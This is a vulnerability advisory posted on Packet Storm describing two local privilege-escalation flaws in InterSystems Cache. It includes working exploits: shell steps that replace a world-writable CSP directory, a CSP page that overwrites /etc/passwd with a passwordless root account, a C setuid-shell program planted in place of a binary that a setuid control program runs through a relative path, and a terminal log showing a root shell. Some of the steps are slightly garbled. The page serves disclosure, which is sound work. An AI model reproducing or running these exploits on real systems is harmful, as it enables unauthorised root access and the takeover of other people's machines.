Further information and research in regards to the InterSystems Cache vulnerabilities discussed here. Two new vulnerabilities have been discovered and exploits are included.
728fbb24e98602c5fe921cab33d49eb861a834a80b0d955bc059096191267f54
Here are more details of my research...
http://packetstormsecurity.nl/0307-exploits/intersystems.txt
These are more details for the above advisory.
Vuln1
Local attackers can exploit this to manipulate directories and binaries
inside the installation tree. This may be used by a local malicious user
to gain root access. The content in /cachesys/csp/user is executed as
root through the web interface. user's parent directory (csp) is world
writeable allowing a local non root user to move user aside, copy its
contents and create a new writeable user directory.
1. mv /cachesys/csp/user /cachesys/csp/user.old
2. cp -rp /cachesys/csp/user /cachesys/csp/user.old
3. cp cspexp.csp /cachesys/csp/user
4. lnyx http://localhost/csp/user/cspexp.csp
5. su - cache
<------------------cspexp.csp------------->
<html>
Intersystems Cache' local root exploit.
Larry W. Cashdollar
http://vapid.dhs.org
Because of poor default file and directory permissions a localuser can
execute
code as root via the cache CSP interpreter.
<HR>
Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.
<script language=Cache runat=server>
Set cdef=##class(%Library.File).%New("/etc/passwd")
Do cdef.Open("WSN")
Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
Do cdef.%Close()
</script>
</html>
Vuln 2
---------
A user who is a member of the group configured at installation to start
and stop the cache database can get local root access by exploting poor
file permissions and the use of relative path names in setuid binaries.
Using the following method.
1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig
2. cd /path/to/cache/bin
3. cat cache.c << -EOF-
#include <stdio.h>
int main(void) {
setuid(0);setgid(0);
system("/bin/sh");
}
-EOF-
4. gcc cache.c -o cache
5. ./cuxs
Details:
cuxs is setuid root and can be configured as executeable by a specific
group upon installation of Cache' database.
cuxs is a control program for Cache, it executes Cache using the following
system call:
execve("../bin/cache",["cache"],...
since by default bin is world write able the binary cache can be moved and
replaced by a malicous one.
[lwc@boureguard lwc]$ cd /usr/ecache
[lwc@boureguard ecache]$ ls -ld bin;cd bin
drwxrwxrwx 2 root root 4096 Mar 18 07:13 bin
[lwc@boureguard bin]$ mv cache cache.orig
[lwc@boureguard bin]$ gcc cache.c -o cache
[lwc@boureguard bin]$ id
uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel)
[lwc@boureguard bin]$ ls -l cuxs
-rwsr-x--- 1 root wheel 16488 Mar 18 06:49 cuxs
[lwc@boureguard bin]$ ./cuxs
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(lwc),10(wheel)
sh-2.05a#
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed